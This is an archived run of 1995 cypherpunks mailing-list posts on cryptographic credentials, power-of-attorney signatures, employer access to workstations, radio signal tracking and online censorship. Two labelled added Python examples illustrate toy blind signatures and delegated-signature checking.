tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Thu, 28 Dec 1995 22:40:35 +0800
To: vznuri@netcom.com (Vladimir Z. Nuri)
Subject: Re: proposal for new cyber abbreviation
In-Reply-To: <199512271947.LAA22943@netcom17.netcom.com>
Message-ID: <199512280403.PAA10201@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello,

"Vladimir Z. Nuri" <vznuri@netcom.com> wrote:
 
> yes, cyberspace just doesn't have enough acronyms like AFAIK and IANAL etc.
> ad nauseam. (I have reason to believe that PTB, or "powers that be" was
...
> SHTBD!!!!
> 
> as in, Something Has To Be Done.
...

Proposed extension:

SHTBD/<agent>

eg:

There's a paedophile on the Internet! SHTBD/PTB!

PTB're trying to regulate cyberspace! SHTBD/EFF!

PTB're pushing GAK! SHTBD/C'punks!

And so on. After all, all sides can cry "SHTBD", can't they?


(Home users may prefer the alternate syntax SHTBD\<agent>, ie
SHTBD\PTB, SHTBD\EFF, SHTBD\C_PUNKS etc :-)

...
> used either seriously or satirically (probably mostly satirically by
> everyone here).
> 
> example:
...
> "I was not implying that SHTBD, merely that we are moving into a brave
> new world in cyberspace".

How about something like:
"I was not implying that SHTBD/PTB to stop it, but that SHTBD/us to
support it/deploy it/get ready for it."

...
> notice that SHTBD is the antithesis of cypherpunk philosophy in that
> it tends to imply
> 
> 1. government intervention

Hence the addition of the <agent> field...

> 2. coercive force
> 3. censorship
...

Yet one of your examples implied the opposite - sorry, I nuked it, but
it was about the media picking bogeymen.

...
> hence by using this term and popularizing it, we promote our own agenda
> of "cryptoanarchy".
...

Fortunately for the anarchists, perhaps, an authoritarian government
is isomorphic to anarchy.


Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMOIXESxV6mvvBgf5AQEOBQQA7ShSGoioMAb6CF5ot0sxu57hvBwMDJDw
MmkBLnPXvoYaL8dOEc5uYhdtLa8hkPapXT3NEUywI1SDDx7QUc4YgbzfQCQNAgz0
HYlfUlL1SA1N7JQIiyHEBN+jWaldzEGGflLxJPy83vm4N1pyo0gluzzi2hMJigcD
FgU3G8LjcoE=
=aBT9
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 29 Dec 1995 15:01:31 +0800
To: cypherpunks@toad.com
Subject: Re: [reply to anonymous] Re: rsaref
Message-ID: <199512290035.QAA09284@ix13.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:06 AM 12/29/95 +0100, Alex de Joode <usura@utopia.hacktic.nl> wrote:
>to whom it may concern:
>
>rsaref20 is available on ftp.hacktic.nl since may 1995 in
>
> /pub/replay/pub/crypto/LIBS/rsaref20.zip

If the RSA folks want to get picky, this may be violating their
copyright, which is enforceable in Europe (unlike their patents.)
There's also an RSAEURO clone of RSAREF which is available on
ftp.ox.ac.uk/pub/crypto, and presumably at many other fine sites.
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
#
# "The price of liberty is eternal vigilance" used to mean us watching
# the government, not the other way around....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vaughan Pratt <pratt@cs.Stanford.EDU>
Date: Fri, 29 Dec 1995 17:58:18 +0800
To: cypherpunks@toad.com
Subject: Re: Fwd: Re: Fwd: Re: FH radios [Dave Emery] [Vaughan Pratt]
In-Reply-To: <9512270551.AA23874@pig.die.com>
Message-ID: <199512290049.QAA28702@Coraki.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



	That is not what Mr Shannon says,  Shannon's law relates data
	rate, bandwidth and signal to noise ratio - the "channel
	capacity" of 26 mhz of spectrum is determined by the signal to
	noise ratio in the 26 mhz channel and ranges from much less
	than 26 mbs to several times that rate depending on the signal
	to noise ratio (and of course how clever the modulation
	technology is at exploiting it).  Witness a 28.8 kb modem which
	stuffs 28.8 kb into less than 3.2 khz given about 32 db gross
	SNR.

Oops, mega*samples*, not megabits, how embarrassing.  I agree with your
numbers, I was low by an order of magnitude or so on the quantity of
data one would need to examine to reconstruct the message.

But now that I think about what 902-928 MHz looks like in practice, I
think I underestimated how hard things could get.  If you're just
trying to track a frequency-hopping signal where the rest of the power
in the band is some mix of Gaussian noise and non-hopping signals, the
carrier should be clearly visible as a spike hopping around in the
band.  As soon as you have two or more frequency-hopping signals
however, keeping track of which carrier is which as they hop around
looks *much* harder.  If they hop at discernibly different times then
you can correlate a carrier that disappeared with the one that appeared
elsewhere at the same time.  This easily described and implemented
approach breaks down when two or more signals hop at the same time.
Here you might try to associate some sort of signature with each signal
to allow you to pair up the new carriers with the old, but you'd have
to know more about the situation to say what signatures would be good.

Similarly a single spread-spectrum signal should be easy to pick out,
but multiple such sounds like an even bigger headache than multiple
hoppers.

	But even the security of mathematical crypto is mostly unproven
	as of yet - we merely think things are difficult to compute
	because we don't know an easy way to do it, not because there
	is a clear proof that is true.

Yes, this is a very important point (but presumably an obvious one to
cypherpunks, maybe I should subscribe).  Worse, even if we *could*
prove a certain protocol secure, the proof will typically apply only to
the protocol and not to any particular message transmitted using that
protocol.  There is a very big difference between proving the absence
of a fast decryption algorithm for a given encryption scheme and
proving that every message so encrypted is secure.  One might call this
distinction existential security vs. universal security.  A universally
T-secure channel is one for which every message is secure from all
T-bounded attacks (algorithms taking time at most T expressed as a
function T(n) of the length n of the message).  An existentially
T-secure channel is one such that for every T-bounded attack there
exists an infinite set of messages all of which are secure from that
attack, though not necessarily the same messages as you vary the
attack.

(As a practical matter it would be more useful to replace the function
T by a fixed long duration such as a googol seconds, provided this
could be achieved with messages of size at most say a kilobyte, a point
of view advocated by e.g. Leonid Levin.  This requires taking the
state-symbol product of the computational model into account when
measuring computational complexity since constant factors can no longer
be neglected; here Kolmogorov complexity is a particularly natural
setting.  This still only addresses algorithmic attacks; for security
against hardware attacks one should also appeal to limits set by physical
constants like c and h-bar.)

The danger is that someone will eventually demonstrate existential
security for a protocol, the proof will as usual be trumpeted in the
New York Times, and it will be interpreted by many as proving universal
security.

An intermediate notion is that of a uniformly existentially secure
channel: there exist some messages secure from all attacks.  But if
those messages can be efficiently identified then such a channel can be
converted to a universally secure channel simply by only transmitting
secure messages.  Modulo the identification problem, this shows that it
is no easier to come up with a uniformly existentially secure protocol
than a universally secure one.

With a few exceptions, arising in e.g. quantum cryptography, we don't
even have existentially secure protocols yet, let alone universally
secure ones.

Vaughan Pratt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Fri, 29 Dec 1995 13:21:45 +0800
To: Scott Brickner <sjb@universe.digex.net>
Subject: Re: Employer Probing Precedents?
In-Reply-To: <Pine.SUN.3.91.951228091552.4338d-100000@goya>
Message-ID: <9512282259.AA12970@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Scott Brickner writes:
 > The notion that, simply because you're wearing a uniform owned by your
 > employer, you're subject to physical search at the employer's
 > discretion is laughable.  The difference between this and searching the
 > computer on one's desk differ only in degree, IMO.

Another vaguely-related concept is that of tenants' rights to a degree
of security in rental property.

My employer owns the workstation in front of me, but in exchange for
supplying them with software and ideas (when I'm not busy sending
e-mail to mailing lists ;-) they've "given" it to me to use in that
pursuit.  They could of course insist that I pay for it, like the old
company store model that railroad workers dealt with.  In a sense I
do pay for it, under the idea that the company would be able to pay me
more if not for the expense of the tools I need for the job.

Though the ownership==control equation works sometimes, and is
appealing to reason, I don't think things are always so simple.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lull@acm.org (John Lull)
Date: Fri, 29 Dec 1995 10:41:50 +0800
To: cypherpunks@toad.com
Subject: Re: Proxy/Representation?
In-Reply-To: <199512281517.JAA13397@cdale1.midwest.net>
Message-ID: <30e2ce46.37070124@smtp.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


David E. Smith wrote:

> The question is: how do the current software packages handle representatives
> and proxies for a given is-a-person?  Using PGP as an example, I can't sign
> a message with Helen's key.  And a message signed with my key won't hold
> as much weight because "Dave" is not "Helen."  And if every message I send
> on behalf of Helen has to be followed up by a message from Helen stating
> "yes, Dave may act on my behalf for this instance" then much of the point
> of the proxy process is lost.  (i.e. the reduction of Helen's workload etc.)

I would think a power-of-attorney, signed by Helen, would do the
trick.  This would normally be valid for some pre-defined period, for
a pre-defined set of transactions, and would not have to be generated
anew each time.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Fri, 29 Dec 1995 17:57:27 +0800
To: m5@dev.tivoli.com (Mike McNally)
Subject: Re: Employer Probing Precedents?
In-Reply-To: <9512282259.AA12970@alpha>
Message-ID: <199512290107.RAA27776@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
> Scott Brickner writes:
>  > The notion that, simply because you're wearing a uniform owned by your
>  > employer, you're subject to physical search at the employer's
>  > discretion is laughable.  The difference between this and searching the
>  > computer on one's desk differ only in degree, IMO.
> 
> Another vaguely-related concept is that of tenants' rights to a degree
> of security in rental property.

Wrong model.  You don't pay rent to your employer for your computer.


Your deskside workstation is just like your desk
that it sits beside when it comes to employer/employee rights.
While a prudent employer won't go through your desk unless it's
required, they do have the right to do so.

Many companies have stated policies as to when they can go through
your desk;  at places like IBM it is very restrictive as to when
managers can go through your desk.  This is merely smart business- giving
people trust is the best way to make them responsible.

All companies should also have written policies that state what
parts of employees' computers/hard drives/home directories/email
etc. are considered private, and under what circumstances management
is allowed to look through those areas.  I managed to sneak a policy
like this into the computer security policy I wrote for a previous employer.
Again, the policy should strictly limit what snooping through employees'
files the company will do.  Any company that goes through its employees'
files with less than sufficient justification is going to generate a lot
of negative reputation, and fast.

Does this allow for employees keeping encrypted material on their
company computer?  I don't think so, or rather I think that it's in
the company's rights to ask for the encryption keys under certain
circumstances- employee leaving company, employee suing company, etc.
If you've kept something damaging on your employer's machine, you better
delete it before the situation gets so bad that they'll be going through
your files.


If you want to keep something secret, put it on your own machine.


-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 29 Dec 1995 15:35:59 +0800
To: Corey Bridges <corey@netscape.com>
Subject: Re: cool cpunk project proposal: "cpunk approved" logo
In-Reply-To: <199512282150.NAA10375@urchin.netscape.com>
Message-ID: <199512290136.RAA05099@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>
>And not to poo-poo a nifty idea, but ultimately, I think that any c'punk
>cooperative effort like that is doomed to failure. Sure, people can manage
>to get together every month or so for a cypherpunk meeting (well, *I* can't,
>but I'm even more disorganized than most), but beyond that, things like
>official c'punk press releases, and official c'punk FAQs, and official
>c'punk seals of approval are just NOT going to happen and still be called
>Officially Cypherpunk. It's tough to have an "official" anything for a group
>that's not REALLY a group--just the name of a mailing list. 

you totally misunderstand my message. this is NOT an "official" project,
it is NOT a cooperative project. I am proposing that INDIVIDUALS undertake
the project under the cypherpunk name. no one has a right to complain
after all, when there is no *official* cypherpunk standard. really, I do
LOVE anarchy.

>Now, this doesn't stop Tim from creating his Cyphernomicon, and it doesn't
>stop other people on this list from issuing their own press releases. Nor
>should it stop you (and other interested parties) from issuing your seal of
>approval to worthy products. I just don't think it'll work to call it the
>Official Cypherpunk S-O-A.

I did not call it that. and in fact I of all people understand cypherpunk
psychology quite well, thank you very much. <g>

>
>Besides, the idea of having an official seal-of-approval sticker sounds like
>we're only one step away from having Cypherpunk action figures. ("New Eric
>Hughes figure with crushing logic grip! Detweiler with whirling Tentacles of
>Doom (tm)!")

not a bad idea imho.  <g>

but really, someone came up with a Big Brother Inside sticker without a
lot of whining about "officialness". all I am proposing is exactly the
same thing, except that it would have the word "cypherpunk" on it. what's
the difference? absolutely none. no one has any right to complain how
the cypherpunk name is used if there is no "official" cypherpunk
management.

but notice I was excessively careful never to imply there was anything
OFFICIAL about the project. there is to be no collaboration or coordination
except that agreed to by participants. what could be simpler???

it's really ridiculous how much the word OFFICIAL is considered 
pornographic on this mailing list. I didn't use that word and went to
great lengths not to (and do so in ALL my mail to this list knowing the
hypersensitivity of its participants).

what I do object to is that because there is no OFFICIAL cypherpunk
standard that individuals cannot create one that they CALL official.
there is NOTHING stopping anyone from claiming they are running the
OFFICIAL cpunk FAQ or whatever as long as there is no OFFICIAL
cpunk management. what, is someone gonna sue? heh. no one has a 
right to complain!! why do I have to reiterate this obvious point?

the sword cuts both ways. or, that communication path is full duplex, 
so to speak.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 29 Dec 1995 15:37:40 +0800
To: cypherpunks@toad.com
Subject: Re:  blind validation
Message-ID: <199512290144.RAA28654@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Those are very interesting thoughts Alex Strasheim posted about
blind validations.  The issue of people handing out copies of their
validations ("credentials" is the term Chaum uses) can be significant.

Chaum's way around it was basically to have some mechanism to give
each person a unique number of some special form.  There doesn't have
to be any agency who knows what number each person has (in fact, there
isn't, in his scheme), but there is a mechanism to assure that one
person does not get two numbers.  This is sometimes loosely referred to
as an "is-a-person" credential (although in this specific context it is
not actually a credential, just an identifier).

One way to achieve the goal would be to make each person give a
thumbprint, or some other biometric identification, in exchange for
giving them the is-a-person credential.  Another way would be to use
conventional ID, making sure their credential is blinded.

Then, the blind validations are mathematically structured to be linked to
the identity number.  Only someone who has a specific identity number can
show a specific blind validation.

The idea here is that this addresses the copying-validation problem
because a person would not only have to give away the specific
validation, but also his identity number.  This would in effect let the
other person masquerade as the first, and any bad things he did would
come back to hurt the person who gave away the data.  You can't just walk
away as in a totally uncontrolled blind signature system because of the
linked nature of the credentials, and because you only get one identity
number.

So the result in effect is to make it difficult to give away just a
validation, without also giving away the ability to act as you.  Here
is an idea about another way to achieve the same thing, closer to
Alex's example:  Alice gets a blind validation as Alex describes based
on a simple blind signature.  (Alice hands a blinded number to Bob, he
signs it, Alice unblinds it, and uses the resulting signed number as
the validation to, say, access Bob's files.)  We add that Alice puts,
say, $100 into "escrow", encrypting it with the secret number and
putting it on some public server.  She proves to Bob that she has done
this using cut and choose.

Now if Alice gives away her secret number, anyone using it will be able
to access Bob's files, but they can also get the $100.  So now it costs
something for Alice to give away her secret.

(There are some major problems with this idea, the worst being that Alice
can extract and spend the $100 right after proving to Bob that she is
doing what she said, and before publishing her number.  Maybe someone
could think of some fixes.)

Hal
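
[Added example, not part of Hal's message: the simple blind-signature exchange he describes (Alice blinds a number, Bob signs it, Alice unblinds it), written as textbook RSA over constructed toy primes. All function names are assumptions; it also shows why Bob cannot link a shown validation to an issuing session, and that a copied validation verifies for whoever holds it.]

```python
import hashlib
import math
import secrets

E = 65537
P, Q = 2**89 - 1, 2**107 - 1           # constructed toy primes (Mersenne), not secure
N = P * Q
D = pow(E, -1, (P - 1) * (Q - 1))      # Bob's private exponent

def h(token):
    """Map a validation token to a number below Bob's modulus."""
    return int.from_bytes(hashlib.sha256(token).digest(), "big") % N

def alice_blind(token):
    """Alice multiplies h(token) by r^E so Bob sees only a random-looking number."""
    r = 0
    while math.gcd(r, N) != 1 or r < 2:
        r = secrets.randbelow(N)
    return (h(token) * pow(r, E, N)) % N, r

def bob_sign(blinded):
    """Bob signs the number he is handed; he never sees the token itself."""
    return pow(blinded, D, N)

def alice_unblind(blind_sig, r):
    """Dividing out r leaves an ordinary signature on h(token)."""
    return (blind_sig * pow(r, -1, N)) % N

def bob_verify(token, sig):
    """Bob's later check takes no identity: any holder of (token, sig) passes."""
    return pow(sig, E, N) == h(token)

def issue(token):
    """One full session; returns what Bob logged and what Alice walks away with."""
    blinded, r = alice_blind(token)
    blind_sig = bob_sign(blinded)
    return blinded, blind_sig, alice_unblind(blind_sig, r)

def explains(blinded, blind_sig, token, sig):
    """Could this logged session have produced this shown validation?

    Solve for the blinding factor that would connect them. One always exists,
    which is why Bob's log tells him nothing about who is showing what.
    """
    r = (blind_sig * pow(sig, -1, N)) % N
    return (h(token) * pow(r, E, N)) % N == blinded

if __name__ == "__main__":
    tok_a, tok_c = b"alice-validation", b"carol-validation"   # constructed tokens
    log_a = issue(tok_a)
    log_c = issue(tok_c)
    print("Alice's validation verifies:", bob_verify(tok_a, log_a[2]))
    print("Session A explains Alice's showing:", explains(*log_a[:2], tok_a, log_a[2]))
    print("Session C explains it equally well:", explains(*log_c[:2], tok_a, log_a[2]))
    # A byte-for-byte copy handed to someone else is indistinguishable to Bob.
    copied_token, copied_sig = tok_a, log_a[2]
    print("Copied validation verifies:", bob_verify(copied_token, copied_sig))
```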




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Cees de Groot" <C.deGroot@inter.nl.net>
Date: Fri, 29 Dec 1995 09:44:38 +0800
To: jpp@software.net (John Pettitt)
Subject: Re: FYI - telecom bill or not there are still censors
In-Reply-To: <2.2.32.19951227172007.0070f34c@mail.software.net>
Message-ID: <199512281652.RAA05245@bofh.cdg.openlink.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


> 
> According to reports popping up in other places around the Compuserve 
> Information Service it appears that they have taken a stance of Internet 
> censor and are now blocking access to certain Usenet newsgroups.  This 
> move took place just before the Christmas holiday and remains unannounced 
> to the membership/subscriber base.  
> 
I got this response so fast, that I cannot do anything else but assume that
they got an automated reply thingy on such requests. For any other simple
question, CI$ needs something like a week to reply...

:To: <C.deGroot@inter.nl.net>
:Subject: Usenet Newsgroups
:
:Re: USENET Newsgroups
:
:
:Thank you for using CompuServe Feedback!  This is in reference
:to your message concerning the disappearance of certain newsgroups
:on CompuServe.
:
:Access to these certain newsgroups have been suspended indefinitely.
:CompuServe has been notified that these areas may be in
:violation of applicable laws or regulations. This matter is
:under further review.
:
:Please let us know if you have any further questions.  Thank you for
:using CompuServe Feedback!
:
:Charlotte Harris
:

I won't start to comment on the style of this message. The term "Suitspeak"
comes to mind.

-- 
Cees de Groot, OpenLink Software		     <C.deGroot@inter.NL.net>
262ui/2048: ID=4F018825 FP=5653C0DDECE4359D FFDDB8F7A7970789 [Key on servers]
 -- Any opinions expressed above might be mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@midwest.net>
Date: Fri, 29 Dec 1995 17:54:23 +0800
To: lull@acm.org (John Lull)
Subject: Re: Proxy/Representation?
Message-ID: <199512290017.SAA00616@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


At 05:07 PM 12/28/95 GMT, lull@acm.org wrote:

>> The question is: how do the current software packages handle representatives
>> and proxies for a given is-a-person?  Using PGP as an example, I can't sign
>> a message with Helen's key.  And a message signed with my key won't hold
>> as much weight because "Dave" is not "Helen."  And if every message I send
>> on behalf of Helen has to be followed up by a message from Helen stating
>> "yes, Dave may act on my behalf for this instance" then much of the point
>> of the proxy process is lost.  (i.e. the reduction of Helen's workload etc.)
>I would think a power-of-attorney, signed by Helen, would do the
>trick.  This would normally be valid for some pre-defined period, for
>a pre-defined set of transactions, and would not have to be generated
>anew each time.
That's basically the situation in the wonderful world of paper.  What
I'm interested in is how to handle the power-of-attorney case in the
world of bits.  (I've been using PGP as my example, but I'm certainly
open to software that handles it better; suggestions?)  Even if Helen
signs my PGP key, that doesn't do anything other than connect us in the
almighty Web of Trust (for whatever that's really worth).

dave

----- David E. Smith, c/o Southeast Missouri State University
1210 Towers South, Cape Girardeau MO USA 63701-4745, +1(573)339-3814
PGP ID 0x92732139, homepage http://www.midwest.net/scribers/dsmith/
Dec15-Jan15: (618)244-3340/2209 Perkins, Mt Vernon IL 62864





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@midwest.net>
Date: Fri, 29 Dec 1995 14:44:33 +0800
To: perry@piermont.com
Subject: Re: Proxy/Representation?
Message-ID: <199512290017.SAA00619@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:46 AM 12/28/95 -0500, perry@piermont.com wrote:

>"David E. Smith" writes:
>> The question is: how do the current software packages handle representatives
>> and proxies for a given is-a-person?  Using PGP as an example, I can't sign
>> a message with Helen's key.
>Nor should you be able to, actually.
And I can't :)

>The right way to do this in the digital world, IMHO, is to have a
>standard for "Power of Attorney" documents, and for the entity
>receiving something signed in your key that should be signed in
>another person's key to also see the digitally signed power of
>attorney document. Then the entity can check the signature on the
>power of attorney was in Helen's key, and that the signed key in that
>document was the key that signed the document signed by the "attorney".
That's more of what I was looking for.  I suppose that (I'm still using
PGP as my example) there could be a shared PGP key, signed by Helen and
myself, where only the two of us know the passphrase, with a keyid of
"David Smith <dsmith@midwest.net> on behalf of Helen Jones <helen@devnull.org>"
or something similar.  The obvious problem is that in sharing the pass
phrase the security is weakened.  (Paranoid threat model: at some point
we have to decide on the pass phrase, and we are videotaped/bugged/spied
upon while this takes place.)

dave

----- David E. Smith, c/o Southeast Missouri State University
1210 Towers South, Cape Girardeau MO USA 63701-4745, +1(573)339-3814
PGP ID 0x92732139, homepage http://www.midwest.net/scribers/dsmith/
Dec15-Jan15: (618)244-3340/2209 Perkins, Mt Vernon IL 62864





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 29 Dec 1995 14:55:23 +0800
To: "David E. Smith" <dsmith@midwest.net>
Subject: Re: Proxy/Representation?
In-Reply-To: <199512290017.SAA00619@cdale1.midwest.net>
Message-ID: <199512290024.TAA10333@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"David E. Smith" writes:
> >The right way to do this in the digital world, IMHO, is to have a
> >standard for "Power of Attorney" documents, and for the entity
> >receiving something signed in your key that should be signed in
> >another person's key to also see the digitally signed power of
> >attorney document. Then the entity can check the signature on the
> >power of attorney was in Helen's key, and that the signed key in that
> >document was the key that signed the document signed by the "attorney".

> That's more of what I was looking for.  I suppose that (I'm still using
> PGP as my example) there could be a shared PGP key, signed by Helen and
> myself, where only the two of us know the passphrase,

Huh? Why? Why would you need such a thing? If you reread what I wrote
above, you would see that such a thing is completely unneeded.

Perry
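
[Added example, not part of the thread: the check a recipient would run under the power-of-attorney scheme Perry describes, with the validity period and transaction scope John Lull mentions. The document fields, function names and toy textbook-RSA keys are assumptions made for illustration; no PGP format is implied.]

```python
import hashlib
import json

E = 65537  # public exponent shared by all toy keys

def keypair(p, q):
    """Textbook RSA from two known primes: returns (modulus, private exponent)."""
    return p * q, pow(E, -1, (p - 1) * (q - 1))

def canon(obj):
    """Deterministic encoding so signer and verifier hash identical bytes."""
    return json.dumps(obj, sort_keys=True, separators=(",", ":")).encode()

def sign(obj, n, d):
    return pow(int.from_bytes(hashlib.sha256(canon(obj)).digest(), "big") % n, d, n)

def verify(obj, sig, n):
    return pow(sig, E, n) == int.from_bytes(hashlib.sha256(canon(obj)).digest(), "big") % n

# Constructed keys built from Mersenne primes; far too small for real use.
HELEN_N, HELEN_D = keypair(2**89 - 1, 2**107 - 1)
DAVE_N, DAVE_D = keypair(2**61 - 1, 2**127 - 1)
MALLORY_N, MALLORY_D = keypair(2**31 - 1, 2**521 - 1)

# The power of attorney: Helen names Dave's key, a scope and a validity period,
# and signs the whole document once.
POA = {
    "principal_key": HELEN_N,
    "delegate_key": DAVE_N,
    "scope": ["reply-to-mail", "schedule-meeting"],
    "not_before": "1995-12-28",
    "not_after": "1996-03-31",
}
POA_SIG = sign(POA, HELEN_N, HELEN_D)

def check_delegated(msg, msg_sig, poa, poa_sig, principal_n, today):
    """Recipient-side check; `today` is an ISO date string."""
    # 1. The power of attorney must be signed in the principal's key.
    if poa.get("principal_key") != principal_n or not verify(poa, poa_sig, principal_n):
        return "reject: power of attorney not signed by principal"
    # 2. The key named in that document must be the key that signed the message.
    if not verify(msg, msg_sig, poa["delegate_key"]):
        return "reject: message not signed by the delegated key"
    # 3. Pre-defined period.
    if not poa["not_before"] <= today <= poa["not_after"]:
        return "reject: outside validity period"
    # 4. Pre-defined set of transactions.
    if msg.get("action") not in poa["scope"]:
        return "reject: action outside delegated scope"
    return "accept"

if __name__ == "__main__":
    msg = {"action": "reply-to-mail", "body": "Helen can meet on Tuesday."}
    sig = sign(msg, DAVE_N, DAVE_D)
    print(check_delegated(msg, sig, POA, POA_SIG, HELEN_N, "1996-01-10"))
    print(check_delegated(msg, sig, POA, POA_SIG, HELEN_N, "1996-04-01"))
    # Editing the signed document (here, extending its expiry) invalidates it.
    stretched = dict(POA, not_after="1999-12-31")
    print(check_delegated(msg, sig, stretched, POA_SIG, HELEN_N, "1996-04-01"))
```

Dave signs with his own key throughout, so no shared key or shared passphrase is involved.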




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Fri, 29 Dec 1995 17:56:40 +0800
To: Eric Murray <ericm@lne.com>
Subject: Re: Employer Probing Precedents?
In-Reply-To: <9512282259.AA12970@alpha>
Message-ID: <9512290129.AA13043@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Eric Murray writes:
 > > Another vaguely-related concept is that of tenants' rights to a degree
 > > of security in rental property.
 > 
 > Wrong model.  You don't pay rent to your employer for your computer.

I don't think you read the rest of my note.  I don't think it's
completely clear that I don't pay rent to my employer for my computer.

 > Does this allow for employees keeping encrypted material on their
 > company computer?  I don't think so, or rather I think that it's in
 > the company's rights to ask for the encryption keys under certain
 > circumstances- employee leaving company, employee suing company, etc.
 > If you've kept something damaging on your employer's machine, you better
 > delete it before the situation gets so bad that they'll be going through
 > your files.

And still this reminds me of tenants property rights.  (And I do agree
the connection is rather thin, but work with me here.)  An apartment
manager can get in to an apartment for a variety of contractually set
reasons.

Maybe what all this means is that, at some point, employees will begin
demanding explicit contracts w.r.t. computer system policies, just
like for basic stuff like salaries & benefits.  Indeed, I know of
several cases where engineers being courted demanded and got perks
like window offices or an extra few PTO days in their initial offer;
why not a contract for what is and isn't "mine" on the network?

(In that light, it'd probably develop that those without such a
contract would be left on poor legal ground.)

(And we'd better stop before Perry yells at us :-)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Fri, 29 Dec 1995 16:24:42 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: cool cpunk project proposal: "cpunk approved" logo
In-Reply-To: <199512290136.RAA05099@netcom17.netcom.com>
Message-ID: <Pine.SUN.3.91.951228194221.18855C-100000@crl12.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Thu, 28 Dec 1995, "Vladimir Z. Nuri" wrote:

> you totally misunderstand my message. this is NOT an "official" project,
> it is NOT a cooperative project. I am proposing that INDIVIDUALS undertake
> the project under the cypherpunk name. no one has a right to complain
> after all, when there is no *official* cypherpunk standard. really, I do
> LOVE anarchy.

Hey Larry, go for it.  I'm sure it will be every bit as successful
as "Cypherwonks."
 
> . . . I of all people understand cypherpunk psychology . . .

Several of them, in fact.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mjsus@atlanta.com
Date: Fri, 29 Dec 1995 17:58:02 +0800
To: cypherpunks@toad.com
Subject: Strategic Investments ....
Message-ID: <199512290101.UAA12519@atlanta.com>
MIME-Version: 1.0
Content-Type: text/plain



This can be some interesting .....


****************************************************************************
**********

                                GLOBAL STRATEGIC SYSTEMS NEWSLETTER

                                                        December, 1995

Strategic Management Investments, Asset Allocation, Evaluation and Review

Strategic Management System (SMS) investments are long-term investments and
total ROIs of these investments can only be evaluated after several years
from the initial decisions and activities. However, this does not mean that
the organization can not evaluate many specific elements and short-term
projects of the whole SMS project separately and obtain some good feedback
